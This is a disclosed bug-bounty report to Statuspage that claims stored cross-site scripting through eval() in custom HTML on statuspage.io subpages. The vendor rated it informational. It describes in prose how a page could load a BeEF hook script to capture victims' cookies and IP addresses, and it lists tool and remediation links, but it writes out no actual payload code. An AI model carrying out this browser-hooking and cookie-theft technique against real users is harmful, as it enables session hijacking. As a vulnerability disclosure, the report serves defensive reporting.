Application is vulnerable to stored XSS

Disclosed by
PuneetLucknowi
  • Engagement Statuspage
  • Disclosed date over 1 year ago
  • Points 5
  • Priority P5 Bugcrowd's VRT priority rating
  • Status Informational This vulnerability is seen as an accepted business risk
Summary by Statuspage

Stored XSS Vulnerability in Statuspage

Summary by PuneetLucknowi

Please share full details it would be helpful for development team to understand the issue.

Report details

  • Submitted

  • Target Location

    *.statuspage.io

  • Target category

    Web App

  • VRT

    Cross-Site Scripting (XSS) > Stored

  • Priority

    P5
  • Bug URL
    https://jokery.statuspage.io/incidents/r033ggcvdnvt?utm_source=manage
  • Description

    Title:

    Application is vulnerable to stored XSS .

    Vulnerability reproduction steps

    User can create web application & utilize HTML embedding to create site, however with html which is acceptable but eval() JavaScript dangerous functions also allowed as input.

    An attacker could create some site application with injected malicious eval() function & utilize beef exploitation kind of tool to run malicious JavaScript payload into victim's browser & can craft various exploitation.

    Creating a single page with JavaScript eval() function to include malicious JavaScript such as hook.js & advertise the page as this page reflects primary domain/FQDN as *.statuspage.io so victim easily trust this page & in that way on viewing the page in which JavaScript malicious reference included through JavaScript eval() could serve malicious payload to victim & successfully craft various XSS based attack through BEEF exploitation framework tool detailed example with Beef Framework exploitation referenced below :

    https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting
    https://zsecurity.org/how-to-use-beef-framework-over-wan/
    https://www.kali.org/tools/beef-xss/

    So advertising a single page could lead to exploitation of multiple users/victims.

    Remediation:

    Please refer below link for remediation:

    https://portswigger.net/web-security/cross-site-scripting/preventing

    Steps:

    1. Injected XSS script eval() function returned in response:
      xsser1.JPG

    2. xss payload executed & various data captured in xsshunter framework cookie, ip address of victim etc.

    xsser2.JPG

    xsser3.JPG

    Recommendation: It is recommended to block execuition of eval() dangerous functions also.

Activity